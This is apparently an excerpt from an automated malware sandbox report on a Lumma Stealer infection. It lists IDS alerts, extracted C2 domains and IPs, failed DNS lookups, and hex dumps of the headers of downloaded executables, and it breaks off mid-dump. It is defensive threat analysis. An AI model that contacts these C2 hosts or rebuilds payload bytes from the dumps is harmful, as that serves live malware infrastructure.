                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49828 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49771 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49795 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49816 -> 104.21.112.1:443
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorIPs: 185.215.113.43
                                Source: Malware configuration extractorURLs: cozyhomevpibes.cyou
                                Source: Malware configuration extractorURLs: importenptoc.com
                                Source: Malware configuration extractorURLs: voicesharped.com
                                Source: Malware configuration extractorURLs: inputrreparnt.com
                                Source: Malware configuration extractorURLs: torpdidebar.com
                                Source: Malware configuration extractorURLs: rebeldettern.com
                                Source: Malware configuration extractorURLs: actiothreaz.com
                                Source: Malware configuration extractorURLs: garulouscuto.com
                                Source: Malware configuration extractorURLs: breedertremnd.com
                                Tries to resolve many domain names, but no domain seems valid
                                Source: unknownDNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: cozyhomevpibes.cyou replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: suggestyuoz.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: toppyneedus.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: pleasedcfrown.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: hoursuhouy.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mixedrecipew.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: affordtempyo.biz replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: lightdeerysua.biz replaycode: Name error (3)
                                Source: global trafficTCP traffic: 192.168.11.20:49802 -> 159.100.19.137:7707
                                Source: global trafficTCP traffic: 192.168.11.20:49808 -> 87.120.113.214:4449
                                Source: global trafficTCP traffic: 192.168.11.20:49820 -> 93.88.203.169:56001
                                Source: global trafficTCP traffic: 192.168.11.20:49832 -> 109.94.208.20:5972
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:19:47 GMTContent-Type: application/octet-streamContent-Length: 2161152Last-Modified: Tue, 11 Feb 2025 07:34:15 GMTConnection: keep-aliveETag: "67aafd77-20fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 60 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4c 00 00 04 00 00 49 8f 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 47 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 46 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 72 78 6e 7a 69 6b 00 40 1a 00 00 10 32 00 00 3c 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 68 7a 66 62 6a 6d 00 10 00 00 00 50 4c 00 00 04 00 00 00 d4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4c 00 00 22 00 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:07 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Tue, 11 Feb 2025 08:16:43 GMTConnection: keep-aliveETag: "67ab076b-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 62 98 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 63 63 70 79 78 77 00 30 1a 00 00 90 30 00 00 28 1a 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 65 78 61 61 74 73 65 00 10 00 00 00 c0 4a 00 00 04 00 00 00 ae 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:14 GMTContent-Type: application/octet-streamContent-Length: 2150400Last-Modified: Tue, 11 Feb 2025 08:17:13 GMTConnection: keep-aliveETag: "67ab0789-20d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 4b 00 00 04 00 00 2f 9d 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 69 6b 6e 62 68 69 00 50 1a 00 00 80 30 00 00 48 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 61 69 73 67 79 72 00 10 00 00 00 d0 4a 00 00 04 00 00 00 aa 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ae 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:20 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:27 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:35 GMTContent-Type: application/octet-streamContent-Length: 814592Last-Modified: Thu, 06 Feb 2025 19:25:08 GMTConnection: keep-aliveETag: "67a50c94-c6e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 a0 02 00 00 10 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 c0 07 00 00 10 05 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:41 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 